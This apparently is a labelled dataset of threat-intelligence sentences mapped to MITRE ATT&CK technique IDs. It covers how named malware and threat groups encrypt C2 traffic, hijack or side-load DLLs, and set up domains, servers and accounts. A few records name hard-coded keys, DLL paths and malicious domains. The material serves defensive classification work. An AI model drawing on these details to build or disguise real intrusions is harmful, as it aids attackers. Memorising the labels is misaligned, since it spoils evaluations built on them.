{"text1":"APT33 has used AES for encryption of command and control traffic.","labels":"['T1573.001']"}
{"text1":"Attor has encrypted data symmetrically using a randomly generated Blowfish (OFB) key which is encrypted with a public RSA key.","labels":"['T1573.001']"}
{"text1":"Azorult can encrypt C2 traffic using XOR.","labels":"['T1573.001']"}
{"text1":"BADCALL encrypts C2 traffic using an XOR\/ADD cipher.","labels":"['T1573.001']"}
{"text1":"BADNEWS encrypts C2 data with a ROR by 3 and an XOR by 0x23.","labels":"['T1573.001']"}
{"text1":"BBSRAT uses a custom encryption algorithm on data sent back to the C2 server over HTTP.","labels":"['T1573.001']"}
{"text1":"BLINDINGCAN has encrypted its C2 traffic with RC4.","labels":"['T1573.001']"}
{"text1":"BRONZE BUTLER has used RC4 encryption (for Datper malware) and AES (for xxmm malware) to obfuscate HTTP traffic. BRONZE BUTLER has also used a tool called RarStar that encodes data with a custom XOR algorithm when posting it to a C2 server.","labels":"['T1573.001']"}
{"text1":"Bandook has used AES encryption for C2 communication.","labels":"['T1573.001']"}
{"text1":"Bazar can send C2 communications with XOR encryption.","labels":"['T1573.001']"}
{"text1":"Before being appended to image files, HAMMERTOSS commands are encrypted with a key composed of both a hard-coded value and a string contained on that day's tweet. To decrypt the commands, an investigator would need access to the intended malware sample, the day's tweet, and the image file containing the command.","labels":"['T1573.001']"}
{"text1":"Bisonal variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some Bisonal samples encrypt C2 communications with RC4.","labels":"['T1573.001']"}
{"text1":"Bonadan can XOR-encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"Bumblebee can encrypt C2 requests and responses with RC4","labels":"['T1573.001']"}
{"text1":"CHOPSTICK encrypts C2 communications with RC4.","labels":"['T1573.001']"}
{"text1":"CORESHELL C2 messages are encrypted with custom stream ciphers using six-byte or eight-byte keys.","labels":"['T1573.001']"}
{"text1":"CallMe uses AES to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"Carbanak encrypts the message body of HTTP traffic with RC2 (in CBC mode). Carbanak also uses XOR with random keys for its communications.","labels":"['T1573.001']"}
{"text1":"ChChes can encrypt C2 traffic with AES or RC4.","labels":"['T1573.001']"}
{"text1":"Cobalt Strike has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.","labels":"['T1573.001']"}
{"text1":"Comnie encrypts command and control communications with RC4.","labels":"['T1573.001']"}
{"text1":"CosmicDuke contains a custom version of the RC4 algorithm that includes a programming error.","labels":"['T1573.001']"}
{"text1":"Darkhotel has used AES-256 and 3DES for C2 communications.","labels":"['T1573.001']"}
{"text1":"Dipsind encrypts C2 data with AES256 in ECB mode.","labels":"['T1573.001']"}
{"text1":"Dridex has encrypted traffic with RC4.","labels":"['T1573.001']"}
{"text1":"During Frankenstein, the threat actors communicated with C2 via an encrypted RC4 byte stream and AES-CBC.","labels":"['T1573.001']"}
{"text1":"Ebury has encrypted C2 traffic using the client IP address, then encoded it as a hexadecimal string.","labels":"['T1573.001']"}
{"text1":"Elise encrypts exfiltrated data with RC4.","labels":"['T1573.001']"}
{"text1":"Epic encrypts commands from the C2 server using a hardcoded key.","labels":"['T1573.001']"}
{"text1":"FALLCHILL encrypts C2 data with RC4 encryption.","labels":"['T1573.001']"}
{"text1":"FatDuke can AES encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"FlawedAmmyy has used SEAL encryption during the initial C2 handshake.","labels":"['T1573.001']"}
{"text1":"FoggyWeb has used a dynamic XOR key and custom XOR methodology for C2 communications.","labels":"['T1573.001']"}
{"text1":"Frankenstein has communicated with a C2 via an encrypted RC4 byte stream and AES-CBC.","labels":"['T1573.001']"}
{"text1":"Gazer uses custom encryption for C2 that uses 3DES.","labels":"['T1573.001']"}
{"text1":"GreyEnergy encrypts communications using AES256.","labels":"['T1573.001']"}
{"text1":"GrimAgent can use an AES key to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"H1N1 encrypts C2 traffic using an RC4 key.","labels":"['T1573.001']"}
{"text1":"Helminth encrypts data sent to its C2 server over HTTP with RC4.","labels":"['T1573.001']"}
{"text1":"HiddenWasp uses an RC4-like algorithm with an already computed PRGA generated key-stream for network communication.","labels":"['T1573.001']"}
{"text1":"Higaisa used AES-128 to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"Hikit performs XOR encryption.","labels":"['T1573.001']"}
{"text1":"HyperStack has used RSA encryption for C2 communications.","labels":"['T1573.001']"}
{"text1":"KEYMARBLE uses a customized XOR algorithm to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"Kobalos's post-authentication communication channel uses a 32-byte-long password with RC4 for inbound and outbound traffic.","labels":"['T1573.001']"}
{"text1":"LightNeuron uses AES to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"LookBack uses a modified version of RC4 for data transfer.","labels":"['T1573.001']"}
{"text1":"Lucifer can perform a decremental-xor encryption on the initial C2 request before sending it over the wire.","labels":"['T1573.001']"}
{"text1":"Lurid performs XOR encryption.","labels":"['T1573.001']"}
{"text1":"Machete has used AES to exfiltrate documents.","labels":"['T1573.001']"}
{"text1":"Metamorfo has encrypted C2 commands with AES-256.","labels":"['T1573.001']"}
{"text1":"More_eggs has used an RC4-based encryption method for its C2 communications.","labels":"['T1573.001']"}
{"text1":"Mosquito uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.","labels":"['T1573.001']"}
{"text1":"MuddyWater has used AES to encrypt C2 responses.","labels":"['T1573.001']"}
{"text1":"Mustang Panda has encrypted C2 communications with RC4.","labels":"['T1573.001']"}
{"text1":"NDiskMonitor uses AES to encrypt certain information sent over its C2 channel.","labels":"['T1573.001']"}
{"text1":"NETEAGLE will decrypt resources it downloads with HTTP requests by using RC4 with the key \"ScoutEagle.\"","labels":"['T1573.001']"}
{"text1":"NETWIRE can use AES encryption for C2 data transferred.","labels":"['T1573.001']"}
{"text1":"NanoCore uses DES to encrypt the C2 traffic.","labels":"['T1573.001']"}
{"text1":"PLAINTEE encodes C2 beacons using XOR.","labels":"['T1573.001']"}
{"text1":"PLEAD has used RC4 encryption to download modules.","labels":"['T1573.001']"}
{"text1":"POWERTON has used AES for encrypting C2 traffic.","labels":"['T1573.001']"}
{"text1":"Pandora has the ability to encrypt communications with D3DES.","labels":"['T1573.001']"}
{"text1":"PingPull can use AES, in cipher block chaining (CBC) mode padded with PKCS5, to encrypt C2 server communications.","labels":"['T1573.001']"}
{"text1":"PlugX can use RC4 encryption in C2 communications.","labels":"['T1573.001']"}
{"text1":"PoisonIvy uses the Camellia cipher to encrypt communications.","labels":"['T1573.001']"}
{"text1":"Prikormka encrypts some C2 traffic with the Blowfish cipher.","labels":"['T1573.001']"}
{"text1":"QuasarRAT uses AES with a hardcoded pre-shared key to encrypt network communication.","labels":"['T1573.001']"}
{"text1":"RDAT has used AES ciphertext to encode C2 communications.","labels":"['T1573.001']"}
{"text1":"RainyDay can use RC4 to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"Rifdoor has encrypted command and control (C2) communications with a stream cipher.","labels":"['T1573.001']"}
{"text1":"SeaDuke C2 traffic has been encrypted with RC4 and AES.","labels":"['T1573.001']"}
{"text1":"Several Lazarus Group malware families encrypt C2 traffic using custom code that uses XOR with an ADD operation and XOR with a SUB operation. Another Lazarus Group malware sample XORs C2 traffic. Other Lazarus Group malware uses Caracachs encryption to encrypt C2 payloads. Lazarus Group has also used AES to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"SideTwist can encrypt C2 communications with a randomly generated key.","labels":"['T1573.001']"}
{"text1":"Sliver can use AES-GCM-256 to encrypt a session key for C2 message exchange.","labels":"['T1573.001']"}
{"text1":"SodaMaster can use RC4 to encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"SombRAT has encrypted its C2 communications with AES.","labels":"['T1573.001']"}
{"text1":"Some Felismus samples use a custom encryption method for C2 traffic that utilizes AES and multiple keys.","labels":"['T1573.001']"}
{"text1":"Some versions of UPPERCUT have used the hard-coded string \u201cthis is the encrypt key\u201d for Blowfish encryption when communicating with a C2. Later versions have hard-coded keys uniquely for each C2 address.","labels":"['T1573.001']"}
{"text1":"Stealth Falcon malware encrypts C2 traffic using RC4 with a hard-coded key.","labels":"['T1573.001']"}
{"text1":"StrifeWater can encrypt C2 traffic using XOR with a hard coded key.","labels":"['T1573.001']"}
{"text1":"Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.","labels":"['T1573.001']"}
{"text1":"Sys10 uses an XOR 0x1 loop to encrypt its C2 domain.","labels":"['T1573.001']"}
{"text1":"TAINTEDSCRIBE uses a Linear Feedback Shift Register (LFSR) algorithm for network encryption.","labels":"['T1573.001']"}
{"text1":"TSCookie has encrypted network communications with RC4.","labels":"['T1573.001']"}
{"text1":"Taidoor uses RC4 to encrypt the message body of HTTP content.","labels":"['T1573.001']"}
{"text1":"The Duqu command and control protocol's data stream can be encrypted with AES-CBC.","labels":"['T1573.001']"}
{"text1":"The IceApple Result Retriever module can AES encrypt C2 responses.","labels":"['T1573.001']"}
{"text1":"The original variant of FakeM encrypts C2 traffic using a custom encryption cipher that uses an XOR key of \u201cYHCRA\u201d and bit rotation between each XOR operation. Some variants of FakeM use RC4 to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"Volgmer uses a simple XOR cipher to encrypt traffic and files.","labels":"['T1573.001']"}
{"text1":"WarzoneRAT can encrypt its C2 with RC4 with the password `warzone160\\x00`.","labels":"['T1573.001']"}
{"text1":"Winnti for Linux has used a custom TCP protocol with four-byte XOR for command and control (C2).","labels":"['T1573.001']"}
{"text1":"Winnti for Windows can XOR encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"XCSSET uses RC4 encryption over TCP to communicate with its C2 server.","labels":"['T1573.001']"}
{"text1":"ZeroT has used RC4 to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"down_new has the ability to AES encrypt C2 communications.","labels":"['T1573.001']"}
{"text1":"gh0st RAT uses RC4 and XOR to encrypt C2 traffic.","labels":"['T1573.001']"}
{"text1":"httpclient encrypts C2 content with XOR using a single byte, 0x12.","labels":"['T1573.001']"}
{"text1":"xCaon has encrypted data sent to the C2 server using a XOR key.","labels":"['T1573.001']"}
{"text1":"Attor's Blowfish key is encrypted with a public RSA key.","labels":"['T1573.002']"}
{"text1":"BISCUIT uses SSL for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"Bazar can use TLS in C2 communications.","labels":"['T1573.002']"}
{"text1":"CHOPSTICK encrypts C2 communications with TLS.","labels":"['T1573.002']"}
{"text1":"Cobalt Strike can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.","labels":"['T1573.002']"}
{"text1":"DarkWatchman can use TLS to encrypt its C2 channel.","labels":"['T1573.002']"}
{"text1":"Dridex has encrypted traffic with RSA.","labels":"['T1573.002']"}
{"text1":"During Operation Wocao, threat actors' proxy implementation \"Agent\" upgraded the socket in use to a TLS socket.","labels":"['T1573.002']"}
{"text1":"Empire can use TLS to encrypt its C2 channel.","labels":"['T1573.002']"}
{"text1":"FIN8 has used the Plink utility to tunnel RDP back to C2 infrastructure.","labels":"['T1573.002']"}
{"text1":"GoldMax has RSA-encrypted its communication with the C2 server.","labels":"['T1573.002']"}
{"text1":"GreyEnergy encrypts communications using RSA-2048.","labels":"['T1573.002']"}
{"text1":"GrimAgent can use a hardcoded server public RSA key to encrypt the first request to C2.","labels":"['T1573.002']"}
{"text1":"Hi-Zor encrypts C2 traffic with TLS.","labels":"['T1573.002']"}
{"text1":"IcedID has used SSL and TLS in communications with C2.","labels":"['T1573.002']"}
{"text1":"Kobalos's authentication and key exchange is performed using RSA-512.","labels":"['T1573.002']"}
{"text1":"Machete has used TLS-encrypted FTP to exfiltrate data.","labels":"['T1573.002']"}
{"text1":"Metamorfo's C2 communication has been encrypted using OpenSSL.","labels":"['T1573.002']"}
{"text1":"OilRig used the Plink utility and other tools to create tunnels to C2 servers.","labels":"['T1573.002']"}
{"text1":"POSHSPY encrypts C2 traffic with AES and RSA.","labels":"['T1573.002']"}
{"text1":"POWERSTATS has encrypted C2 traffic with RSA.","labels":"['T1573.002']"}
{"text1":"Pay2Key has used RSA encrypted communications with C2.","labels":"['T1573.002']"}
{"text1":"Penquin can encrypt communications using the BlowFish algorithm and a symmetric key exchanged with Diffie Hellman.","labels":"['T1573.002']"}
{"text1":"PoetRAT used TLS to encrypt command and control (C2) communications.","labels":"['T1573.002']"}
{"text1":"Pupy's default encryption for its C2 communication channel is SSL, but it also has transport options for RSA and AES.","labels":"['T1573.002']"}
{"text1":"REvil has encrypted C2 communications with the ECIES algorithm.","labels":"['T1573.002']"}
{"text1":"Rising Sun variants can use SSL for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"Sliver can use mutual TLS and RSA  cryptography to exchange a session key.","labels":"['T1573.002']"}
{"text1":"Small Sieve can use SSL\/TLS for its HTTPS Telegram Bot API-based C2 channel.","labels":"['T1573.002']"}
{"text1":"SombRAT can SSL encrypt C2 traffic.","labels":"['T1573.002']"}
{"text1":"Some Volgmer variants use SSL to encrypt C2 communications.","labels":"['T1573.002']"}
{"text1":"StrongPity has encrypted C2 traffic using SSL\/TLS.","labels":"['T1573.002']"}
{"text1":"Sykipot uses SSL for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"TinyTurla has the ability to encrypt C2 traffic with SSL\/TLS.","labels":"['T1573.002']"}
{"text1":"Trojan.Karagany can secure C2 communications with SSL and TLS.","labels":"['T1573.002']"}
{"text1":"Tropic Trooper has used SSL to connect to C2 servers.","labels":"['T1573.002']"}
{"text1":"WannaCry uses Tor for command and control traffic and routes a custom cryptographic protocol over the Tor circuit.","labels":"['T1573.002']"}
{"text1":"WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS.","labels":"['T1573.002']"}
{"text1":"WellMess can communicate to C2 with mutual TLS where client and server mutually check certificates.","labels":"['T1573.002']"}
{"text1":"XTunnel uses SSL\/TLS and RC4 to encrypt traffic.","labels":"['T1573.002']"}
{"text1":"Zebrocy uses SSL and AES ECB for encrypting C2 communications.","labels":"['T1573.002']"}
{"text1":"adbupd contains a copy of the OpenSSL library to encrypt C2 traffic.","labels":"['T1573.002']"}
{"text1":"ShimRat can hijack the cryptbase.dll within migwiz.exe to escalate privileges and bypass UAC controls.","labels":"['T1574']"}
{"text1":"A FinFisher variant uses DLL search order hijacking.","labels":"['T1574.001']"}
{"text1":"APT41 has used search order hijacking to execute malicious payloads, such as Winnti RAT.","labels":"['T1574.001']"}
{"text1":"Crutch can persist via DLL search order hijacking on Google Chrome, Mozilla Firefox, or Microsoft OneDrive.","labels":"['T1574.001']"}
{"text1":"Downdelph uses search order hijacking of the Windows executable sysprep.exe to escalate privileges.","labels":"['T1574.001']"}
{"text1":"Empire contains modules that can discover and exploit various DLL hijacking opportunities.","labels":"['T1574.001']"}
{"text1":"FoggyWeb's loader has used DLL Search Order Hijacking to load malicious code instead of the legitimate `version.dll` during the `Microsoft.IdentityServer.ServiceHost.exe` execution process.","labels":"['T1574.001']"}
{"text1":"Hikit has used DLL Search Order Hijacking to load \"oci.dll\" as a persistence mechanism.","labels":"['T1574.001']"}
{"text1":"InvisiMole can be launched by using DLL search order hijacking in which the wrapper DLL is placed in the same folder as explorer.exe and loaded during startup into the Windows Explorer process instead of the legitimate library.","labels":"['T1574.001']"}
{"text1":"Melcoz can use DLL hijacking to bypass security controls.","labels":"['T1574.001']"}
{"text1":"MirageFox is likely loaded via DLL hijacking into a legitimate McAfee binary.","labels":"['T1574.001']"}
{"text1":"PlugX has the ability to use DLL search order hijacking for installation on targeted systems.","labels":"['T1574.001']"}
{"text1":"PowerSploit contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.","labels":"['T1574.001']"}
{"text1":"RTM has used search order hijacking to force TeamViewer to load a malicious DLL.","labels":"['T1574.001']"}
{"text1":"RedLeaves is launched through use of DLL search order hijacking to load a malicious dll.","labels":"['T1574.001']"}
{"text1":"Threat Group-3390 has performed DLL search order hijacking to execute their payload.","labels":"['T1574.001']"}
{"text1":"Variants of WEBC2 achieve persistence by using DLL search order hijacking, usually by copying the DLL file to \"%SYSTEMROOT%\" (\"C:\\WINDOWS\\ntshrui.dll\").","labels":"['T1574.001']"}
{"text1":"WastedLocker has performed DLL hijacking before execution.","labels":"['T1574.001']"}
{"text1":"Whitefly has used search order hijacking to run the loader Vcrodat.","labels":"['T1574.001']"}
{"text1":"A Patchwork .dll that contains BADNEWS is loaded and executed using DLL side-loading.","labels":"['T1574.002']"}
{"text1":"A gh0st RAT variant has used DLL side-loading.","labels":"['T1574.002']"}
{"text1":"APT19 launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.","labels":"['T1574.002']"}
{"text1":"APT3 has been known to side load DLLs with a valid version of Chrome with one of their tools.","labels":"['T1574.002']"}
{"text1":"APT32 ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).","labels":"['T1574.002']"}
{"text1":"APT41 used legitimate executables to perform DLL side-loading of their malware.","labels":"['T1574.002']"}
{"text1":"BADNEWS typically loads its DLL file into a legitimate signed Java or VMware executable.","labels":"['T1574.002']"}
{"text1":"BRONZE BUTLER has used legitimate applications to side-load malicious DLLs.","labels":"['T1574.002']"}
{"text1":"BlackTech has used DLL side loading by giving DLLs hardcoded names and placing them in searched directories.","labels":"['T1574.002']"}
{"text1":"Clambling can store a file named `mpsvc.dll`, which opens a malicious `mpsvc.mui` file, in the same folder as the legitimate Microsoft executable `MsMpEng.exe` to gain execution.","labels":"['T1574.002']"}
{"text1":"Denis exploits a security vulnerability to load a fake DLL and execute its code.","labels":"['T1574.002']"}
{"text1":"During Operation CuckooBees, the threat actors used the legitimate Windows services `IKEEXT` and `PrintNotify` to side-load malicious DLLs.","labels":"['T1574.002']"}
{"text1":"During the T9000 installation process, it drops a copy of the legitimate Microsoft binary igfxtray.exe. The executable contains a side-loading weakness which is used to load a portion of the malware.","labels":"['T1574.002']"}
{"text1":"Earth Lusca has placed a malicious payload in `%WINDIR%\\SYSTEM32\\oci.dll` so it would be sideloaded by the MSDTC service.","labels":"['T1574.002']"}
{"text1":"Ecipekac can abuse the legitimate application policytool.exe to load a malicious DLL.","labels":"['T1574.002']"}
{"text1":"Egregor has used DLL side-loading to execute its payload.","labels":"['T1574.002']"}
{"text1":"FinFisher uses DLL side-loading to load malicious programs.","labels":"['T1574.002']"}
{"text1":"Goopy has the ability to side-load malicious DLLs with legitimate applications from Kaspersky, Microsoft, and Google.","labels":"['T1574.002']"}
{"text1":"HTTPBrowser has used DLL side-loading.","labels":"['T1574.002']"}
{"text1":"Higaisa\u2019s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the \"OINFO12.OCX\" dynamic link library.","labels":"['T1574.002']"}
{"text1":"HyperBro has used a legitimate application to sideload a DLL to decrypt, decompress, and run a payload.","labels":"['T1574.002']"}
{"text1":"Javali can use DLL side-loading to load malicious DLLs into legitimate executables.","labels":"['T1574.002']"}
{"text1":"Kerrdown can use DLL side-loading to load malicious DLLs.","labels":"['T1574.002']"}
{"text1":"LookBack side loads its communications module as a DLL into the \"libcurl.dll\" loader.","labels":"['T1574.002']"}
{"text1":"Metamorfo has side-loaded its malicious DLL file.","labels":"['T1574.002']"}
{"text1":"MuddyWater maintains persistence on victim networks through side-loading dlls to trick legitimate programs into running malware.","labels":"['T1574.002']"}
{"text1":"Mustang Panda has used a legitimately signed executable to execute a malicious payload within a DLL file.","labels":"['T1574.002']"}
{"text1":"Nebulae can use DLL side-loading to gain execution.","labels":"['T1574.002']"}
{"text1":"Pandora can use DLL side-loading to execute malicious payloads.","labels":"['T1574.002']"}
{"text1":"PowGoop can side-load `Goopdate.dll` into `GoogleUpdate.exe`.","labels":"['T1574.002']"}
{"text1":"RCSession can be installed via DLL side-loading.","labels":"['T1574.002']"}
{"text1":"RainyDay can use side-loading to run malicious executables.","labels":"['T1574.002']"}
{"text1":"Sakula uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files.","labels":"['T1574.002']"}
{"text1":"SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.","labels":"['T1574.002']"}
{"text1":"Sidewinder has used DLL side-loading to drop and execute malicious payloads including the hijacking of the legitimate Windows application file rekeywiz.exe.","labels":"['T1574.002']"}
{"text1":"SysUpdate can load DLLs through vulnerable legitimate executables.","labels":"['T1574.002']"}
{"text1":"Threat Group-3390 has used DLL side-loading, including by using legitimate Kaspersky antivirus variants in which the DLL acts as a stub loader that loads and executes the shell code.","labels":"['T1574.002']"}
{"text1":"Tropic Trooper has been known to side-load DLLs using a valid version of a Windows Address Book and Windows Defender executable with one of their tools.","labels":"['T1574.002']"}
{"text1":"Waterbear has used DLL side loading to import and load a malicious DLL loader.","labels":"['T1574.002']"}
{"text1":"Wingbird side loads a malicious file, sspisrv.dll, in part of a spoofed lssas.exe service.","labels":"['T1574.002']"}
{"text1":"ZeroT has used DLL side-loading to load malicious payloads.","labels":"['T1574.002']"}
{"text1":"menuPass has used DLL side-loading to launch versions of Mimikatz and PwDump6 as well as UPPERCUT.","labels":"['T1574.002']"}
{"text1":"APT41 has configured payloads to load via LD_PRELOAD.","labels":"['T1574.006']"}
{"text1":"XCSSET adds malicious file paths to the \"DYLD_FRAMEWORK_PATH\" and \"DYLD_LIBRARY_PATH\" environment variables to execute malicious code.","labels":"['T1574.006']"}
{"text1":"Empire contains modules that can discover and exploit search order hijacking vulnerabilities.","labels":"['T1574.008']"}
{"text1":"Empire contains modules that can discover and exploit unquoted path vulnerabilities.","labels":"['T1574.009']"}
{"text1":"One variant of BlackEnergy locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.","labels":"['T1574.010']"}
{"text1":"Lazarus Group has abused the \"KernelCallbackTable\" to hijack process control flow and execute shellcode.","labels":"['T1574.013']"}
{"text1":"LAPSUS$ has created new virtual machines within the target's cloud environment after leveraging credential access to cloud assets.","labels":"['T1578.002']"}
{"text1":"LAPSUS$ has deleted the target's systems and resources in the cloud to trigger the organization's incident and crisis response process.","labels":"['T1578.003']"}
{"text1":"APT1 has registered hundreds of domains for use in operations.","labels":"['T1583.001']"}
{"text1":"APT28 registered domains imitating NATO, OSCE security websites, Caucasus information resources, and other organizations.","labels":"['T1583.001']"}
{"text1":"APT29 has acquired C2 domains, sometimes through resellers.","labels":"['T1583.001']"}
{"text1":"APT32 has set up and operated websites to gather information and deliver malware.","labels":"['T1583.001']"}
{"text1":"Dragonfly has registered domains for targeting intended victims.","labels":"['T1583.001']"}
{"text1":"Earth Lusca has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.","labels":"['T1583.001']"}
{"text1":"FIN7 has registered look-alike domains for use in phishing campaigns.","labels":"['T1583.001']"}
{"text1":"Ferocious Kitten has acquired domains imitating legitimate sites.","labels":"['T1583.001']"}
{"text1":"For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains.","labels":"['T1583.001']"}
{"text1":"For Operation Dust Storm, the threat actors established domains as part of their operational infrastructure.","labels":"['T1583.001']"}
{"text1":"For Operation Spalax, the threat actors registered hundreds of domains using Duck DNS and DNS Exit.","labels":"['T1583.001']"}
{"text1":"Gamaredon Group has registered multiple domains to facilitate payload staging and C2.","labels":"['T1583.001']"}
{"text1":"HEXANE has registered and operated domains for campaigns, often using a security or web technology theme or impersonating the targeted organization.","labels":"['T1583.001']"}
{"text1":"IndigoZebra has established domains, some of which were designed to look like official government domains, for their operations.","labels":"['T1583.001']"}
{"text1":"Lazarus Group has acquired domains related to their campaigns to act as distribution points and C2 channels.","labels":"['T1583.001']"}
{"text1":"Leviathan has established domains that impersonate legitimate entities to use for targeting efforts.","labels":"['T1583.001']"}
{"text1":"Magic Hound has registered fraudulent domains such as \"mail-newyorker.com\" and \"news12.com.recover-session-service.site\" to target specific victims with phishing attacks.","labels":"['T1583.001']"}
{"text1":"Mustang Panda have acquired C2 domains prior to operations.","labels":"['T1583.001']"}
{"text1":"Silent Librarian has acquired domains to establish credential harvesting pages, often spoofing the target organization and using free top level domains .TK, .ML, .GA, .CF, and .GQ.","labels":"['T1583.001']"}
{"text1":"TA505 has registered domains to impersonate services such as Dropbox to distribute malware.","labels":"['T1583.001']"}
{"text1":"TeamTNT has obtained domains to host their payloads.","labels":"['T1583.001']"}
{"text1":"UNC2452 has acquired C2 domains through resellers.","labels":"['T1583.001']"}
{"text1":"menuPass has registered malicious domains for use in intrusion campaigns.","labels":"['T1583.001']"}
{"text1":"Axiom has acquired dynamic DNS services for use in the targeting of intended victims.","labels":"['T1583.002']"}
{"text1":"HEXANE has set up custom DNS servers to send commands to compromised hosts via TXT records.","labels":"['T1583.002']"}
{"text1":"Axiom has used VPS hosting providers in targeting of intended victims.","labels":"['T1583.003']"}
{"text1":"Dragonfly has acquired VPS infrastructure for use in malicious campaigns.","labels":"['T1583.003']"}
{"text1":"HAFNIUM has operated from leased virtual private servers (VPS) in the United States.","labels":"['T1583.003']"}
{"text1":"Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role.","labels":"['T1583.004']"}
{"text1":"For Operation Honeybee, at least one identified persona was used to register for a free account for a control server.","labels":"['T1583.004']"}
{"text1":"Lazarus Group has acquired servers to host their malicious tools.","labels":"['T1583.004']"}
{"text1":"Sandworm Team has leased servers from resellers instead of leasing infrastructure directly from hosting companies to enable its operations.","labels":"['T1583.004']"}
{"text1":"APT17 has created profile pages in Microsoft TechNet that were used as C2 infrastructure.","labels":"['T1583.006']"}
{"text1":"APT28 has used newly-created Blogspot pages for credential harvesting operations.","labels":"['T1583.006']"}
{"text1":"APT29 has registered algorithmically generated Twitter handles that are used for C2 by malware, such as HAMMERTOSS.","labels":"['T1583.006']"}
{"text1":"Earth Lusca has established GitHub accounts to host their malware.","labels":"['T1583.006']"}
{"text1":"For Operation Sharpshooter, the threat actors used Dropbox to host lure documents and their first-stage downloader.","labels":"['T1583.006']"}
{"text1":"HAFNIUM has acquired web services for use in C2 and exfiltration.","labels":"['T1583.006']"}
{"text1":"IndigoZebra created Dropbox accounts for their operations.","labels":"['T1583.006']"}
{"text1":"LazyScripter has established GitHub accounts to host its toolsets.","labels":"['T1583.006']"}
{"text1":"Magic Hound has acquired Amazon S3 buckets to use in C2.","labels":"['T1583.006']"}
{"text1":"POLONIUM has created and used legitimate Microsoft OneDrive accounts for their operations.","labels":"['T1583.006']"}
{"text1":"Turla has created web accounts including Dropbox and GitHub for C2 and document exfiltration.","labels":"['T1583.006']"}
{"text1":"ZIRCONIUM has used GitHub to host malware linked in spearphishing e-mails.","labels":"['T1583.006']"}
{"text1":"APT1 hijacked FQDNs associated with legitimate websites hosted by hop points.","labels":"['T1584.001']"}
{"text1":"APT29 has compromised domains to use for C2.","labels":"['T1584.001']"}
{"text1":"Kimsuky has compromised legitimate sites and used them to distribute malware.","labels":"['T1584.001']"}
{"text1":"Lazarus Group has compromised legitimate domains, including those hosted in the US and Italy, for C2.","labels":"['T1584.001']"}
{"text1":"Magic Hound has used compromised domains to host links targeted to specific phishing victims.","labels":"['T1584.001']"}
{"text1":"SideCopy has compromised domains for some of their infrastructure, including for C2 and staging malware.","labels":"['T1584.001']"}
{"text1":"Transparent Tribe has compromised domains for use in targeted malicious campaigns.","labels":"['T1584.001']"}
{"text1":"UNC2452 has compromised domains to use for C2.","labels":"['T1584.001']"}
{"text1":"APT16 has compromised otherwise legitimate sites as staging servers for second-stage payloads.","labels":"['T1584.004']"}
{"text1":"Dragonfly has compromised legitimate websites to host C2 and malware modules.","labels":"['T1584.004']"}
{"text1":"During Night Dragon, threat actors compromised web servers to use for C2.","labels":"['T1584.004']"}
{"text1":"Earth Lusca has used compromised web servers as part of their operational infrastructure.","labels":"['T1584.004']"}
{"text1":"Indrik Spider has served fake updates via legitimate websites that have been compromised.","labels":"['T1584.004']"}
{"text1":"Turla has used compromised servers as infrastructure.","labels":"['T1584.004']"}
{"text1":"Sandworm Team has used a large-scale botnet to target Small Office\/Home Office (SOHO) network devices.","labels":"['T1584.005']"}
{"text1":"Turla has frequently used compromised WordPress sites for C2 infrastructure.","labels":"['T1584.006']"}
{"text1":"APT32 has set up Facebook pages in tandem with fake websites.","labels":"['T1585.001']"}
{"text1":"Fox Kitten has used a Twitter account to communicate with ransomware victims.","labels":"['T1585.001']"}
{"text1":"HEXANE has established fraudulent LinkedIn accounts impersonating HR department employees to target potential victims with fake job offers.","labels":"['T1585.001']"}
{"text1":"Kimsuky has created social media accounts to monitor news and security trends as well as potential targets.","labels":"['T1585.001']"}
{"text1":"Lazarus Group has created new LinkedIn and Twitter accounts to conduct social engineering against potential victims.","labels":"['T1585.001']"}
{"text1":"APT1 has created email accounts for later use in social engineering, phishing, and when registering domains.","labels":"['T1585.002']"}
{"text1":"EXOTIC LILY has created e-mail accounts to spoof targeted organizations.","labels":"['T1585.002']"}
{"text1":"For FunnyDream, the threat actors likely established an identified email account to register a variety of domains that were used during the campaign.","labels":"['T1585.002']"}
{"text1":"HEXANE has established email accounts for use in domain registration including for ProtonMail addresses.","labels":"['T1585.002']"}
{"text1":"Kimsuky has created email accounts for phishing operations.","labels":"['T1585.002']"}
{"text1":"Leviathan has created new email accounts for targeting efforts.","labels":"['T1585.002']"}
